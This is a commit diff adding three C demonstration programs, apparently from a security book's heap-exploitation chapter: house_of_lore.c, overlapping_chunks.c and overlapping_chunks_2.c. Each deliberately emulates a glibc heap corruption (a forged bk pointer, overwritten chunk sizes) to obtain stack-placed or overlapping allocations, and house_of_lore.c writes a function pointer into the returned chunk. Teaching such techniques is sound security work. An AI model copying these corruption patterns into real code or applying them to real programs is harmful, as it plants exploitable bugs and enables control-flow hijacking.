finish 3.3.6; add 3.3.7

2025-06-24 04:05:03 +07:00 · 2018-01-14 22:33:28 +08:00
parent e4e9127baa
commit 7a450288f9
9 changed files with 714 additions and 9 deletions
--- a/src/Others/3.3.5_heap_exploit/house_of_lore.c
+++ b/src/Others/3.3.5_heap_exploit/house_of_lore.c
@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+
+void jackpot(){ puts("Nice jump d00d"); exit(0); }
+
+int main() {
+    intptr_t *victim = malloc(0x80);
+    memset(victim, 'A', 0x80);
+    void *p5 = malloc(0x10);
+    memset(p5, 'A', 0x10);
+    intptr_t *victim_chunk = victim - 2;
+    fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
+
+    intptr_t* stack_buffer_1[4] = {0};
+    intptr_t* stack_buffer_2[3] = {0};
+    stack_buffer_1[0] = 0;
+    stack_buffer_1[2] = victim_chunk;
+    stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
+    stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
+    fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
+    fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
+
+    free((void*)victim);
+    fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
+    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
+    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
+
+    void *p2 = malloc(0x100);
+    fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
+    fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
+    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
+    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
+
+    victim[1] = (intptr_t)stack_buffer_1;
+    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
+
+    void *p3 = malloc(0x40);
+    char *p4 = malloc(0x80);
+    memset(p4, 'A', 0x10);
+    fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
+    fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
+
+    intptr_t sc = (intptr_t)jackpot;
+    memcpy((p4+40), &sc, 8);
+}
--- a/src/Others/3.3.5_heap_exploit/overlapping_chunks.c
+++ b/src/Others/3.3.5_heap_exploit/overlapping_chunks.c
@ -0,0 +1,39 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+
+int main() {
+    intptr_t *p1,*p2,*p3,*p4;
+
+    p1 = malloc(0x90 - 8);
+    p2 = malloc(0x90 - 8);
+    p3 = malloc(0x80 - 8);
+    memset(p1, 'A', 0x90 - 8);
+    memset(p2, 'A', 0x90 - 8);
+    memset(p3, 'A', 0x80 - 8);
+    fprintf(stderr, "Now we allocate 3 chunks on the heap\n");
+    fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3);
+
+    free(p2);
+    fprintf(stderr, "Freeing the chunk p2\n");
+
+    int evil_chunk_size = 0x111;
+    int evil_region_size = 0x110 - 8;
+    *(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2
+    fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n");
+
+    p4 = malloc(evil_region_size);
+    fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size);
+    fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80);
+
+    fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n");
+    memset(p4, 'B', 0xd0);
+    fprintf(stderr, "p4 = %s\n", (char *)p4);
+    fprintf(stderr, "p3 = %s\n", (char *)p3);
+
+    fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n");
+    memset(p3, 'C', 0x50);
+    fprintf(stderr, "p4 = %s\n", (char *)p4);
+    fprintf(stderr, "p3 = %s\n", (char *)p3);
+}
--- a/src/Others/3.3.5_heap_exploit/overlapping_chunks_2.c
+++ b/src/Others/3.3.5_heap_exploit/overlapping_chunks_2.c
@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <malloc.h>
+
+int main() {
+    intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
+    unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
+    int prev_in_use = 0x1;
+
+    p1 = malloc(0x10);
+    p2 = malloc(0x80);
+    p3 = malloc(0x80);
+    p4 = malloc(0x80);
+    p5 = malloc(0x10);
+    real_size_p1 = malloc_usable_size(p1);
+    real_size_p2 = malloc_usable_size(p2);
+    real_size_p3 = malloc_usable_size(p3);
+    real_size_p4 = malloc_usable_size(p4);
+    real_size_p5 = malloc_usable_size(p5);
+    memset(p1, 'A', real_size_p1);
+    memset(p2, 'A', real_size_p2);
+    memset(p3, 'A', real_size_p3);
+    memset(p4, 'A', real_size_p4);
+    memset(p5, 'A', real_size_p5);
+    fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n");
+    fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1));
+    fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2));
+    fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3));
+    fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4));
+    fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));
+
+    free(p4);
+    fprintf(stderr, "\nLet's free the chunk p4\n\n");
+
+    fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n");
+    *(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE 
+
+    free(p2);
+
+    p6 = malloc(0x1b0 - 0x10);
+    real_size_p6 = malloc_usable_size(p6);
+    fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6);
+
+    fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n");
+    fprintf(stderr, "p3 before = %s\n", (char *)p3);
+    memset(p6, 'B', 0xd0);
+    fprintf(stderr, "p3 after  = %s\n", (char *)p3);
+}